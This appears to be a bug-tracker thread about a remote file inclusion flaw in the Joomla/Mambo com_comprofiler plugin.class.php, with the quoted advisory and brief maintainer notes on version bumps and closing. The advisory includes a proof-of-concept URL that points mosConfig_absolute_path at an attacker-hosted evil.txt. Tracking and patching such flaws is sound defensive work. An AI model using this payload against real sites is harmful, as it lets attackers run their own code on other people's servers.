Vulnerability: ~~~~~~~~~~~~~~~ in folder com_comprofiler we found vulnerability script plugin.class.php -----------------------plugin.class.php---------------------- <?php /** * Plugin handler * @package Joomla * @author various, JoomlaJoe and Beat */ require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' ); ---------------------------------------------------------- Variables $mosConfig_absolute_path are not properly sanitized. Proof Of Concept: ~~~~~~~~~~~~~~~~ http://[target]/[path]/administrator/components/com_comprofiler/plugin.c lass.php?mosConfig_absolute_path= http://attacker.com/evil.txt? Solution: ~~~~~~~~ sanitize variabel $mosConfig_absolute_path in plugin.class.php
Bump to Joomla 1.0.11 and future Mambo 4.6 Release is required.
joomla done. why are there 3 bugs for the same issue?
Removing Joomla from Summary as it is handled on bug #145481.
-r2 in CVS
closing without GLSA (~arch) thanks Renat